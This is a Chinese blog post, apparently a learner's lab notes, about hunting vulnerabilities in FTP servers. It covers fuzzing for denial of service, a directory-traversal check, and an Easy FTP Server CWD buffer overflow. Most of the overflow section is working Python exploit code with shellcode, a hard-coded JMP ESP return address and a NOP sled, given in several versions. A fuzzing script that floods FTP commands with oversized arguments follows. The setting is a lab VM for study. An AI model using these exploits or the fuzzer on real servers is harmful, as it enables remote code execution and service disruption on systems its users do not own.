您的位置:首页 > 编程语言 > PHP开发

FTP的漏洞挖掘

2020-07-14 06:29 1306 查看

 

FTP协议简介

漏洞挖掘手记1:DOS

  原理是对FTP协议中的命令及命令参数进行脏数据替换,构造畸形FTP命令并发送给被测试FTP服务程序。

下了一个FTPFuzz,界面丑绝人寰

开启Quick ‘n Easy FTP Server

开启后,做实验并没有崩溃,不能触发DOS攻击。可能和SP3有关

漏洞挖掘手记2:访问权限

在WIN7中开启CompleteFTP Server

登陆不了,新建个账户吧

FTP 目录在本地系统中的“/Home/user”

所以这这就绕过了?

easyFTP 缓冲区溢出漏洞

  Easy FTP Server执行CWD时未对参数进行长度有效性校验,传递超长参数会造成缓冲区溢出.

启动easyFTP,开启后生成三个XML配置文件和一个文件夹

挂连上OD,按F9继续运行

实验失败:

代码如下:

import socket
import sys
def ftp_test(ip,port):
target = ip
port = port
shellcode = ('\x50\x20'
'\xD9\xEE'
'\xD9\x74\x24\xF4'
'\x58'
'\x83\xC0\x1b'
'\x33\xC9'
'\x8A\x1C\x08'
'\x80\xF3\x11'
'\x88\x1C\x08'
'\x41'
'\x80\xFB\x90'
'\x75\xF1'
'\xed\x79\x7b\x1b\x29\x0f\x79\x72\x98\xc0\x5e\x79\x23\x65\x80\x1d'
'\x9a\xe5\x9c\x6f\xe5\x22\xca\xa6\x15\x3a\xf2\x77\xaa\x22\x23\x42'
'\x79\x64\x62\x74\x63\x45\x22\xc3\x75\x9a\x4b\x21\x9a\x5a\x1d\x9a'
'\x58\x0d\x9a\x18\x9a\x78\x19\xbc\x2c\x7b\x1b\x29\x0f\x64\x14\x84'
'\xee\x46\xe9\x84\x71\x9a\x54\x2d\x9a\x5d\x14\x69\x12\xdc\x9a\x48'
'\x31\x12\xcc\x22\xee\x56\x9a\x25\xaa\x12\xe4\x88\x1e\xaf\x17\x2b'
'\xd5\x65\x19\xd0\xdb\x16\x12\xc1\x57\xfa\xe0\x2a\x45\x35\x0d\x64'
'\xf5\x9a\x48\x35\x12\xcc\x77\x9a\x2d\x6a\x9a\x48\x0d\x12\xcc\x12'
'\x3d\xaa\x84\x4e\xba\x46\x70\x2c\x7b\x1b\x29\x0f\x64\xb8\x22\xca'
'\x42\x79\x75\x70\x21\x32\x79\x32\x41\x70\x7f\x9a\xd5\x42\x41\x41'
'\x42\xee\x46\xed\x42\xee\x46\xe9\x81')
buffer =  shellcode+'a'*(268-198)+'\xa0\x6f\x5f\x7d'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target,port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
s.recv(1024)
s.send('USER anonymouss\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
print "[+] Sending buffer..."
s.send('CWD' + buffer + '\r\n')
try:
s.recv(1024)
print "failed"
except:
print "ok"
s.close()
if __name__ == '__main__':
ftp_test("192.168.211.129", 21)

转去网上搜索别人的代码,他人代码用到的是 pwntools 包,在windows上安装不了,我笑了。呵呵哒。此处贴上他人利用的代码

from pwn import *
p = remote("192.168.253.156", 21)
jmp_esp = 0x7E429353
shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
nop = "\x90" * 12
payload = 'a' * 268 + p32(jmp_esp) +  nop + shellcode
print p.recv(1024)
p.sendline("USER anonymous")
print p.recv(1024)
p.sendline("PASS anonymous")
print p.recv(1024)
p.sendline("CWD " + payload)
p.interactive()

 继续接着做实验 ,成功,排查原因:代码少写一个空格。所以此处提醒大家,注意细节。

执行CWD命令后发生缓冲区溢出,直接找CWD命令,使用OD查找ws2_32.Rev,但是怎么找呢?使用IDA(不会用啊,感觉又得恶补一下了)每天问别人,今天先把攻击的代码写了

此处暂停

 

 此处修改为jmp esi

中文版xp用不了

贴上最终代码

import socket
import sys
import time
def ftp_test(ip,port):
target = ip
port = port
jmp_esp = 0x7E429353
shellcode = "\x33\xDB\x53\x68\x6E\x63\x68\x21\x68\x74\x62\x72\x61\x68\x67\x69\x61\x6E\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\x45\x7E\xFF\xD0"
nop = "\x90" * 12
buffer = 'a' * 268 + '\x53\x93\x52\x7E' +  nop + shellcode
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect((target,port))
print "[+] Connected!"
except:
print "[!] Connection failed!"
sys.exit(0)
time.sleep(1)
s.send('USER anonymous\r\n')
s.recv(1024)
s.send('PASS anonymous\r\n')
s.recv(1024)
print "[+] Sending buffer..."
s.send('CWD ' + buffer + '\r\n')
try:
h = s.recv(1024)
print h
print "failed"
except:
print "ok"
s.close()
if __name__ == '__main__':
ftp_test("192.168.211.129", 21)

 

Fuzz DIY

# -*- coding: utf-8 -*-
# @Date    : 2017-02-19 21:44:12
# @Author  : giantbranch (giantbranch@gmail.com)
# @Link    : http://blog.csdn.net/u012763794?viewmode=contents
# @Link    : http://www.giantbranch.cn/
import sys
import socket
buffer = 'a' * 4
fuzzcmd = ['mdelete', 'cd', 'mkdir', 'delete', 'cwd', 'mdir', 'mput', 'mls', 'rename', 'site index' ]
if len(sys.argv) != 4:
print "[*] Please input like this: python fuzzFtp.py 192.168.253.151 21 1"
sys.exit(0)
target = sys.argv[1]
port = int(sys.argv[2])
mode = int(sys.argv[3])
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
print target
print port
con = s.connect((target, port))
print "[*] Connected!"
except:
print "[*] Connect failed!"
sys.exit(0)
# 接受欢迎信息
s.recv(1024)
s.send("USER anonymous\r\n")
s.recv(1024)
s.send("PASS anonymous\r\n")
s.recv(1024)
j = 100
if mode ==1:
print "[*] Sending payload..."
for i in fuzzcmd:
s.send(i + ' ' + buffer*j + '\r\n')
s.send(i + ' ' + buffer*j*4 + '\r\n')
s.send(i + ' ' + buffer*j*8 + '\r\n')
s.send(i + ' ' + buffer*j*40 + '\r\n')
s.send(i + ' ' + buffer + ' ' + buffer + '\r\n')
try:
s.recv(1024)
print "[!] WuWu, Failed!"
except :
print "[+] Yeah! Maybe you find a Bug!"
if mode == 2:
s.send('cd ../\r\n')
ds = s.recv(50).find("550")
if ds != -1:
print "[+] Yeah! Maybe you can cd ../!"
if mode == 2:
s.send('cd ..\\r\n')
dss = s.recv(50).find("550")
if dss != -1:
print "[+] Yeah! Maybe you can cd ..\!"

运行完毕,服务端特别卡

未成功

 

转载于:https://www.cnblogs.com/Ccmr/p/7340496.html

内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签: